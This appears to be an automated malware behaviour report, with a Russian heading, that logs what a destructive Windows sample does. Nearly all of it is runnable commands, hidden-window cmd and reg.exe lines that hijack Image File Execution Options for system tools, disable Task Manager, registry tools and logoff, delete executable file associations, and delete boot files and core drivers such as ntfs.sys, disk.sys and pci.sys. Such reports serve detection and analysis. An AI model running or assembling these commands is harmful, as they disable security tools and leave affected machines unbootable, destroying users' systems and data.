Техническая информация
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shutdown.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wininit.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runas.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Netplwiz.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tasklist.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonUI.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdboot.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskpart.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskperf.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe] 'debugger' = '\\'
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logoff.exe] 'debugger' = '\\'
- Диспетчера задач (Taskmgr)
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- <DRIVERS>\kbdhid.sys
- <DRIVERS>\acpipmi.sys
- <DRIVERS>\pciide.sys
- <DRIVERS>\processr.sys
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\MountedDevices /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c rd <SYSTEM32>\Boot' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c rd %WINDIR%\Boot\DVD\PCAT' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c rd %WINDIR%\Boot\DVD\EFI' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del %WINDIR%\Boot\PCAT\bootmgr' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del %WINDIR%\Boot\EFI\bootmgr.efi' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\kbdhid' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\kbdhid.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\kbdclass' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\sysfile /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\kbdclass.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\mountmgr.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\mouhid' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\mouhid.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\mouclass' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\mouclass.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\wuauclt.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\logonUI.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\logoff.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\userinit.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\mountmgr' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\wininit.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\khook.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\pciidex' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\pciidex.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\pciide' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\pciide.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\pci' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\pci.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\ntfs' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\ntfs.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{dd70bc80-ef44-421b-8ac3-cd31da613a4e} /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\acpi.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\reg.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\hidclass' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\hidclass.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\hidusb' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\hidusb.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\disk' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\disk.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\acpipmi' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\acpipmi.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\acpi' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\khook' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\sysfile /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.js /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.js /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\Netplwiz.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\diskperf.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\dism.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\diskpart.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\control.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\bcdboot.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\bcdedit.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\taskmgr.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\rundll32.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\explorer.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\taskkill.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\shutdown.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\cmd.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\mmc.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\regedit.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 1 /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\tasklist.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\runas.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\resmon.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\svchost.exe /v debugger /t REG_SZ /d \\ /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.sys /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.vbs /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.sys /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\scrfile /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\scrfile /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\comfile /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\comfile /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.scr /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.scr /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.com /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.com /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.vbs /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.msc /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.cmd /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.cmd /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.bat /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.bat /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\exefile /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\exefile /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.exe /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.exe /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.msc /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\processr.sys' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\processr' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\diskpart.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\taskmgr.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\bcdboot.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\dism.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\tasklist.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\Netplwiz.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\rundll32.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\resmon.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\.msc /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\exefile /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\svchost.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\.msc /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\.exe /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\.exe /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\.bat /f
- '<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\diskperf.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\control.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\mmc.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\pci.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\pci
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\pciide.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\pciide
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\pciidex.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\pciidex
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\processr.sys
- '<SYSTEM32>\reg.exe' DELETE HKCR\exefile /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\runas.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\processr
- '<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\cmd.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\taskkill.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\regedit.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\bcdedit.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\explorer.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\ntfs
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\shutdown.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\scrfile /f
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\processr
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\.cmd /f
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\mountmgr
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\kbdclass
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\kbdhid
- '<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\MountedDevices /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\reg.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\acpi
- '<SYSTEM32>\reg.exe' DELETE HKCR\.cmd /f
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\acpipmi
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\hidclass
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\hidusb
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\khook
- '<SYSTEM32>\reg.exe' DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{dd70bc80-ef44-421b-8ac3-cd31da613a4e} /f
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\ntfs
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\pci
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\pciidex
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\mouclass
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\mouhid
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\wuauclt.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\logonUI.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\logoff.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\.com /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\.vbs /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\.com /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\.scr /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\.scr /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\comfile /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\comfile /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\.bat /f
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\ntfs.sys
- '<SYSTEM32>\reg.exe' DELETE HKCR\scrfile /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\.sys /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\.js /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\sysfile /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\.js /f
- '<SYSTEM32>\reg.exe' DELETE HKCR\sysfile /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\wininit.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\userinit.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\.vbs /f
- '<SYSTEM32>\reg.exe' DELETE HKCU\Software\Classes\.sys /f
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\disk
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{dd70bc80-ef44-421b-8ac3-cd31da613a4e} /f
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\acpipmi.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.msc /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.msc /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.exe /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.exe /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\exefile /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\exefile /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.bat /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\tasklist.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.bat /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.cmd /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.vbs /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.vbs /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.com /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.com /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.scr /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.scr /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\runas.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\svchost.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\rundll32.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\resmon.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\Netplwiz.exe /v debugger /t REG_SZ /d \\ /f
